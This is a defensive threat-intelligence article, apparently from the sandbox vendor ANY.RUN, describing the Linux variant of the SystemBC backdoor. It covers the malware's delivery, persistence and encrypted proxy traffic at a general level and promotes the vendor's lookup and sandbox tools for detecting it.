Threat analysts are raising alarm: a Linux version of SystemBC, a well-known RAT, is targeting Linux-based enterprise servers and cloud infrastructure.
SystemBC, a malware often used as a backdoor in cyberattacks, was first spotted in 2018. It gives malefactors a remote control over the infected host and delivers malicious payload including trojans and ransomware.
Emerging as Windows-only, it recently obtained a Linux variant thus becoming cross-platform and much more harmful since Linux-based servers are commonly used in enterprise environments. Security teams must take this threat most seriously.
SystemBC for Linux: a closer look into the features
ANY.RUN’s analysts matched the traffic of SystemBC’s Windows and Linux versions
This quite sophisticated piece of malware is designed to act as a SOCKS5 proxy or a backdoor, giving attackers persistent access to compromised systems. It is often used in ransomware campaigns, especially involving Egregor or Ryuk, to facilitate command-and-control (C2) communications.
- SystemBC is typically delivered through phishing emails, exploit kits, or through vulnerabilities in Linux servers. It can also be secondary payload in other malware attacks.
- The Linux version is executed as a binary file disguised as a legitimate system process or service. Attackers may use shell scripts or cron jobs to automate the execution.
- Cron jobs are created to run the malware’s processes at given intervals or after the system reboots. SystemBC can also register itself as a systemd service to load automatically with the system.
- SystemBC uses SOCKS5 proxy with encrypted communications to mask its traffic and prevent detection by network monitoring tools. It mimics legitimate traffic, often using common ports (e.g., 80, 443).
- The Linux variant’s developers succeeded in making it lightweight, leaving minimal traces on the filesystem and reducing the chances of detection by endpoint protection tools.
Collect the Latest Threat Intel on SystemBC’s Linux Variant
Once SystemBC is in your network, you are in big trouble. It is not the end of the world, there are ways to restrain and counter an attack, mitigate the consequences and restore the system. But certainly, proactive prevention is highly preferrable. Threat intelligence is one of the first defensive weapons of your choice. Explore the malware’s indicators, behaviors, tactics and techniques to fine-tune your cyber protection circuit.
SystemBC knows how to avoid detection and resist sandboxes, it encrypts its traffic and recognizes virtual machines. However, ANY.RUN’s inventory knows how to deal with malware of this kind.
1. Employ Threat Intelligence Lookup to turn the variety of SystemBC’s IOCs into initial points for further research: use associated domains, file hashes, mutexes, registry keys, and other indicators as search requests.
os:”22.04.2″ and threatName:”systembc”
Linux-tailored malware campaign samples
The tab “Tasks” in the search results displays more sandbox sessions with the Linux variant of SystemBC recently conducted by cybersecurity researchers. Click any task to view the emulation in the sandbox and gather more TTPs.
| 50 free search requests at your disposal to give TI Lookup a test before adding it to your SOC toolbox |
- Use the Interactive Sandbox to let SystemBC loose in a controlled environment, watch it interact with the endpoint and collect IOCs for further exploring and extracting applicable insights.
SystemBC sample detonated inside the sandbox
It comes to stay, brings friends along: why SystemBC is dangerous
Why are SystemBC in general and SystemBC tailored for Linux in particular, worth attention?
- Persistent and Stealthy: the malware is alarmingly good at maintaining long-term access to compromised systems without being detected.
- Vehicle for Ransomware: SystemBC often carries payload to facilitate ransomware attacks.
- Targets Critical Infrastructure: Linux servers are often used in corporate and enterprise networks and cloud environments. Compromising them can lead to widespread disruption, data theft, or financial losses.
Conclusion
The Linux variant of SystemBC proxy implant is potentially designed for internal corporate services. It is commonly used to target corporate networks, cloud servers, and even IoT devices.
It gives attackers freedom of lateral movement across a network and pivoting without deploying additional detectable tools.
It’s vital for SOC teams to quickly detect malicious communication with in-depth network traffic insights, powered by advanced tools like Threat Intelligence Lookup by ANY.RUN.
